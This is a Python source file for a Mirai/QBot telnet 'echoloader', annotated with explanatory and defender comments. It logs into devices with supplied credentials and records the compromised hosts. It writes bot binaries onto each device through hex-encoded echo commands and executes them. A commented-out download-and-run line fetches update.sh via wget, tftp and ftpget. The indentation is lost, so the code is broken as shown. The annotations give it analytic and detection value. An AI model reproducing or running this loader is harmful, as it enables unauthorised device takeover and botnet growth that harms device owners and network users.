#!/usr/bin/python
#Phaaaat hax telnet loader by Freak/Milenko
import sys, re, os, socket, time, select
from threading import Thread
# rekdevice is a single shell line: it changes into the first directory that succeeds from a
# fixed list, tries to fetch update.sh over HTTP (wget), TFTP and anonymous FTP (each also
# through the busybox applet), marks it mode 777, runs it with sh and deletes it.
# The server address is 0.0.0.0 in this copy, and the only reference to rekdevice in this
# file is a commented-out send inside infect().
# Defender note: the fetch / chmod 777 / sh / rm -rf sequence for update.sh is a command-line
# pattern that can be matched in telnet session logs and honeypot captures.
rekdevice = "cd /tmp || cd /home/$USER || cd /var/run || cd /mnt || cd /root || cd /; wget http://0.0.0.0/update.sh; busybox wget http://0.0.0.0/update.sh; tftp -r update.sh -g 0.0.0.0; busybox tftp -r update.sh -g 0.0.0.0; ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 update.sh update.sh; chmod 777 update.sh; busybox chmod 777 update.sh; sh update.sh; rm -rf update.sh"
# Exit with a usage message unless a list file was given as the first argument.
if len(sys.argv) < 2:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
# Banner. It states the input format (one "ip:port user:pass" entry per line), the bins/
# directory holding the dlr.ARCH files, and the bots.txt output file.
print "\033[31m"
print "S-S-SUUUPER fast telnet echoloader by Freak"
print
print "Reads ip:port user:pass and simply checks the IP for port 23 then echoloads mirai/qbot binaries"
print "ensure the binaries are in the \"bins\" directory under the proper dlr.ARCH filenames."
print "All working telnets are saved to \"bots.txt\""
# Worker thread count is read interactively from stdin.
threads = int(raw_input("Threads: "))
# The whole list file is read into memory; the handle is never closed explicitly.
lines = open(sys.argv[1],"r").readlines()
import random
# Entries are processed in random order.
random.shuffle(lines)
# A "global" statement at module level has no effect; fh is already a module-level name.
global fh
# Append-mode log of hosts where the login and shell probe succeeded (written in infect()).
fh = open("bots.txt","a+")
def chunkify(lst, n):
    """Deal *lst* into *n* interleaved sub-lists.

    Item ``i`` of *lst* lands in sub-list ``i % n``. The result always has
    exactly *n* entries, some of which may be empty.
    """
    buckets = []
    for offset in range(n):
        buckets.append(lst[offset::n])
    return buckets
# Count of check() worker threads that have started and not yet finished.
running = 0
# Progress counters: incremented in infect(), reported by printStatus().
tftp = wget = echo = logins = ran = 0
def printStatus():
    """Print the module-level progress counters every five seconds, forever.

    Never returns; the file starts it on its own thread.
    """
    global echo, tftp, wget, logins, ran
    while True:
        time.sleep(5)
        fields = [
            "\033[32m[\033[31m+\033[32m] Logins: ", str(logins),
            " Ran:", str(ran),
            " Echoes:", str(echo),
            " Wgets:", str(wget),
            " TFTPs:", str(tftp),
            "\033[37m",
        ]
        print "".join(fields)
def readUntil(tn, advances, timeout=8):
    """Accumulate data from *tn* until any item of *advances* shows up in it.

    Reads up to 1024 bytes per pass and pauses 0.1 s between passes. Returns
    everything received so far on the first match, or "" once *timeout*
    seconds have elapsed without one. Exceptions raised by ``tn.recv``
    propagate to the caller.
    """
    received = ''
    began = time.time()
    while time.time() - began < timeout:
        received += tn.recv(1024)
        time.sleep(0.1)
        if any(marker in received for marker in advances):
            return received
    return ""
def recvTimeout(sock, size, timeout=8):
    """Return up to *size* bytes from *sock*, or "" if nothing arrives in time.

    Switches *sock* to non-blocking mode and waits up to *timeout* seconds
    for it to become readable before doing a single ``recv``.
    """
    sock.setblocking(0)
    readable, _, _ = select.select([sock], [], [], timeout)
    if not readable:
        return ""
    return sock.recv(size)
def contains(data, array):
    """Return True when at least one element of *array* occurs in *data*."""
    return any(needle in data for needle in array)
def split_bytes(s, n):
    """Yield consecutive slices of *s*, each at most *n* items long.

    Every slice except possibly the last has exactly *n* items; an empty *s*
    yields nothing. *n* must be at least 4 (checked with ``assert`` when
    iteration starts).
    """
    assert n >= 4
    total = len(s)
    for offset in range(0, total, n):
        yield s[offset:offset + n]
# infect(ip, username, password): open a telnet session to one host with a supplied
# credential pair, confirm a shell by echoing a marker, record the host, then write a small
# binary onto the device with repeated echo commands and execute it.
# Uses the module-level file handle fh and updates the module-level counters.
# Every path returns None.
# NOTE(review): indentation was lost in this copy, so the block nesting described in the
# comments below is inferred from statement order -- confirm against an intact copy.
# Defender note: strings in this function that are observable in telnet session captures or
# on the device filesystem are the probe output "AK47", the files .keksec, updDl and
# dvrHelper, and the replies "FIN" and "CAPSAICIN" that the loader searches for.
def infect(ip, username, password):
global echo
global tftp
global wget
global logins
global ran
# String searched for in device output; a match is printed as INFECTED and the host is
# appended to infected.txt.
infectedkey = "CAPSAICIN"
# TCP connect to port 23 with a 0.5 s timeout; any failure closes the socket and returns.
try:
tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tn.settimeout(0.5)
tn.connect((ip, 23))
except:
try:
tn.close()
except:
pass
return
# Login exchange: wait for a ":" in the banner and send the username, wait for another ":"
# and send the password, then read whatever the device prints next.
try:
hoho = ''
hoho += readUntil(tn, ":")
if ":" in hoho:
tn.send(username + "\n")
time.sleep(0.1)
hoho = ''
hoho += readUntil(tn, ":")
if ":" in hoho:
tn.send(password + "\n")
time.sleep(0.8)
else:
pass
prompt = ''
prompt += recvTimeout(tn, 8192)
# The reply counts as a shell prompt if it contains ">", "#", "$" or "@". The first branch
# excludes replies containing "ONT", but the elif accepts ">" again without that exclusion.
if ">" in prompt and "ONT" not in prompt:
success = True
elif "#" in prompt or "$" in prompt or "@" in prompt or ">" in prompt:
success = True
else:
tn.close()
return
except:
tn.close()
return
if success == True:
# Sends four commands (enable, system, shell, sh) one after another, then a probe that
# echoes the hex-escaped bytes 0x41 0x4b 0x34 0x37, i.e. ASCII "AK47".
try:
tn.send("enable\r\n")
tn.send("system\r\n")
tn.send("shell\r\n")
tn.send("sh\r\n")
tn.send("echo -e '\\x41\\x4b\\x34\\x37'\r\n")
except:
tn.close()
return
time.sleep(1)
try:
buf = recvTimeout(tn, 8192)
except:
tn.close()
return
# "AK47" in the reply means the echo was interpreted by a shell. The host and credentials
# are printed, counted, and appended to the module-level handle fh as "ip:23 user:pass".
if "AK47" in buf:
print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
logins += 1
fh.write(ip + ":23 " + username + ":" + password + "\n")
fh.flush()
# The rekdevice download command is commented out in this copy and buf is reset to the
# empty string, so the "bytes", "saved" and infectedkey checks that follow cannot match here.
# tn.send(rekdevice + "\r\n")
# time.sleep(15)
buf = "" #recvTimeout(tn, 1024*1024)
loaded = False
if "bytes" in buf:
print "\033[32m[\033[31m+\033[32m] \033[33mTFTP \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
tftp += 1
loaded = True
elif "saved" in buf:
print "\033[32m[\033[31m+\033[32m] \033[33mWGET \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
wget += 1
loaded = True
if infectedkey in buf:
ran += 1
print "\033[32m[\033[31m+\033[32m] \033[35mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
f=open("infected.txt", "a")
f.write(ip +":23 " + username + ":" + password + "\r\n")
f.close()
if loaded:
tn.close()
return
# Writable-directory search: change into the first directory that succeeds from a fixed list,
# dump /proc/mounts, and for every mount line containing " rw" write the marker bytes to
# <mount point>/.keksec, read the file back and remove it. If "AK47" comes back, cd there.
tn.send("cd /tmp || cd /home/$USER || cd /var/run || cd /mnt || cd /root || cd /\r\n")
tn.send("cat /proc/mounts||busybox cat /proc/mounts\r\n")
mounts = recvTimeout(tn, 1024*1024)
for line in mounts.split("\n"):
try:
# Second space-separated field of the /proc/mounts line, used as the directory to test.
path = line.split(" ")[1]
if " rw" in line:
tn.send("echo -e '%s' > %s/.keksec||busybox echo -e '%s' > %s/.keksec; cat %s/.keksec||busybox cat %s/.keksec; rm %s/.keksec||busybox rm %s/.keksec\r\n" % ("\\x41\\x4b\\x34\\x37", path, "\\x41\\x4b\\x34\\x37", path, path, path, path, path))
if "AK47" in recvTimeout(tn, 1024*1024):
tn.send("cd %s\r\n" % path) #cd into the writeable directory
except:
continue
# Echo loading: for each of nine local files under bins/ (dlr.arm ... dlr.spc), the file is
# read, hex-escaped in 128-byte pieces, and sent as "echo -ne '...' > updDl" for the first
# piece and ">> updDl" for the rest, with 10 ms between pieces.
for binary in "dlr.arm dlr.arm7 dlr.mips dlr.ppc dlr.x86 dlr.m68k dlr.mpsl dlr.sh4 dlr.spc".split(" "):
binloaded = False
while binloaded == False:
try:
first = True
count = 0
hexdata = []
for chunk in split_bytes(open("bins/" + binary, "rb").read(), 128):
hexdata.append(''.join(map(lambda c:'\\x%02x'%c, map(ord, chunk))))
parts = len(hexdata)
for hexchunk in hexdata:
seq = ">" if first else ">>"
tn.send("echo -ne '" + hexchunk + "' " + seq + " updDl\r\n")
first = False
count += 1
time.sleep(0.01)
print "\033[32m[\033[31m+\033[32m] \033[33mECHO \033[31m---> \033[32m" + ip + " \033[31m---> \033[36m(" + str(count) + "/" + str(parts) + ") " + binary + "\033[37m"
# The reassembled file is made mode 777, executed and removed; ./dvrHelper is then executed
# and removed as well. This file does not show where dvrHelper comes from.
tn.send("chmod 777 updDl||busybox chmod 777 updDl\r\n")
tn.send("./updDl\r\n")
time.sleep(3)
tn.send("rm -rf ./updDl\r\n")
time.sleep(0.1)
tn.send("./dvrHelper\r\n")
time.sleep(1)
tn.send("rm -rf ./dvrHelper\r\n")
time.sleep(0.1)
# Outcome is read from the device's output: "FIN" is counted as an echo load and logged to
# echoes.txt; infectedkey is counted as ran and logged to infected.txt. Either one ends the
# session. Otherwise the loop moves on to the next file name.
buf = recvTimeout(tn, 1024*1024)
if "FIN" in buf:
echo += 1
print "\033[32m[\033[31m+\033[32m] \033[33mECHOLOADED \033[31m---> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[31m ---> \033[35m%s\033[37m" %(username, password, ip, binary)
tn.close()
f=open("echoes.txt","a")
f.write(ip +":23 " + username + ":" + password + "\r\n")
f.close()
return
if infectedkey in buf:
ran += 1
f=open("infected.txt", "a")
f.write(ip +":23 " + username + ":" + password + "\r\n")
f.close()
print "\033[32m[\033[31m+\033[32m] \033[35mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
tn.close()
return
binloaded = True
except:
pass
# Fallback branch: close the session and return. Which "if" this else pairs with cannot be
# determined without the original indentation.
else:
tn.close()
return
# check(chunk, fh): worker-thread body. Walks one slice of the input list, parses each entry
# into ip / username / password, tests that TCP port 23 accepts a connection, and hands
# the host to infect().
# The fh parameter is not referenced in this body; infect() uses the module-level fh.
# NOTE(review): indentation was lost in this copy; nesting is inferred from statement order.
# Defender note: each reachable host sees a bare connect-and-close on TCP 23 immediately
# followed by a second connection from the same source that performs the login.
def check(chunk, fh):
global running
running += 1
# The running count at start doubles as this thread's label in the final message.
threadID = running
for login in chunk:
try:
# Rewrite "ip:23 user:pass" / "ip:2323 user:pass" to "ip:user:pass". The listed port is
# discarded: both this function and infect() always connect to port 23.
if ":23 " in login:
login = login.replace(":23 ", ":")
if ":2323 " in login:
login = login.replace(":2323 ", ":")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.5)
# Accept either ip:user:pass or user:pass:ip; socket.inet_aton raises on a field that is not
# an IPv4 address, which selects the layout. Entries matching neither are skipped.
try:
socket.inet_aton(login.split(":")[0])
ip = login.split(":")[0]
username = login.split(":")[1]
password = login.split(":")[2]
except:
try:
socket.inet_aton(login.split(":")[2])
ip = login.split(":")[2]
username = login.split(":")[0]
password = login.split(":")[1]
except:
continue
# Reachability test with a 0.5 s timeout; a failed connect raises and is swallowed by the
# outer except, so infect() is only called for hosts that accepted the connection.
s.connect((ip, 23))
s.close()
infect(ip, username, password)
except:
pass
print "\033[32m[\033[31m+\033[32m] Thread " + str(threadID) + " has finished scanning " + str(len(chunk)) + " IPs."
running -= 1
# Launch sequence: normalise the list, split it across the requested number of threads,
# start the status printer and the workers, then wait for the operator to stop the run.
lines = map(lambda s: s.strip(), lines) # strip surrounding whitespace, including newlines
import random
# Second shuffle; the list was already shuffled once right after it was read.
random.shuffle(lines)
chunks = chunkify(lines, threads) # make a separate chunk for each thread
print "STARTING SCAN AND LOAD!!!"
Thread(target = printStatus, args = ()).start()
# One worker per chunk. From the 385th thread onward (index >= 384) each start is preceded
# by a 0.2 s pause. Failures to start a thread are ignored.
for thread in xrange(0,threads):
if thread >= 384:
time.sleep(0.2)
try:
Thread(target = check, args = (chunks[thread], fh,)).start()
except:
pass
print "Scanning... Press enter 3 times to stop."
# Blocks until three lines have been read from stdin.
for i in range(0,3):
raw_input()
fh.close()
# Signal 9 to the process's own pid ends it, and every worker thread, immediately.
os.kill(os.getpid(), 9)